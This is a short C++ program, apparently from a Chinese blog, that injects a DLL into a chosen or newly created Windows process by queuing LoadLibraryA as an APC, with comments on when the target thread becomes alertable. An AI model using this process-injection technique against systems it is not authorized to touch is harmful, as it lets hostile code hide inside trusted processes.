1 #include <iostream>
2 #include <Windows.h>
3 #include <TlHelp32.h>
4
5 using namespace std;
6
7 /*
8 APC注入条件:
9 目标线程处于可唤醒状态
10 如使用以下API时就处于可唤醒状态
11 SleepEx, SignalObjectAndWait, WaitForSingleObjectEx, WaitForMultipleObjectsEx,MsgWaitForMultipleObjectsEx
12 参数dwPid默认为0,表示自动创建目标进程并立刻生效注入,否则,注入现有目标,等待目标唤醒时执行APC回调
13 */
14 BOOL APCInject(char *dllUrl,DWORD dwPid=0,char *exeUrl=NULL);
15
16 int main(void)
17 {
18
19 cout << APCInject("c:\\desktop\\test.dll",3980) << endl;
20 return 0;
21 }
22
23 BOOL APCInject(char *dllUrl,DWORD dwPid,char *exeUrl)
24 {
25 HANDLE hSnap=NULL,hPro=NULL,hThr=NULL;
26 BOOL bOk = FALSE;
27 LPVOID hVir = NULL;
28 THREADENTRY32 te = {0};
29
30 if (!dwPid)
31 {
32 STARTUPINFO wi = {0};
33 PROCESS_INFORMATION pi = {0};
34
35 wi.cb = sizeof(wi);
36 CreateProcessA("c:\\desktop\\123.exe",NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&wi,&pi);
37 hPro = pi.hProcess;
38 hThr = pi.hThread;
39 } else {
40 te.dwSize = sizeof(te);
41 hPro = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwPid);
42 if (!hPro)
43 return FALSE;
44 hSnap = CreateToolhelp32Snapshot(4,dwPid);
45 bOk = Thread32First(hSnap,&te);
46 while (bOk)
47 {
48 if (te.th32OwnerProcessID == dwPid)
49 {
50 hThr = OpenThread(THREAD_ALL_ACCESS,FALSE,te.th32ThreadID);
51 break;
52 }
53
54 bOk = Thread32Next(hSnap,&te);
55 }
56 CloseHandle(hSnap);
57 }
58
59 if (!hThr)
60 return FALSE;
61 hVir = VirtualAllocEx(hPro,NULL,strlen(dllUrl)+1,MEM_COMMIT,PAGE_READWRITE);
62 if (!hVir)
63 return FALSE;
64 if (!WriteProcessMemory(hPro,hVir,dllUrl,strlen(dllUrl)+1,NULL))
65 return FALSE;
66 CloseHandle(hPro);
67 if (QueueUserAPC((PAPCFUNC)GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA"),hThr,(DWORD)hVir))
68 {
69 if (!dwPid)
70 {
71 ResumeThread(hThr);
72 CloseHandle(hThr);
73 }
74 return TRUE;
75 }
76 CloseHandle(hThr);
77 return FALSE;
78 }
浙公网安备 33010602011771号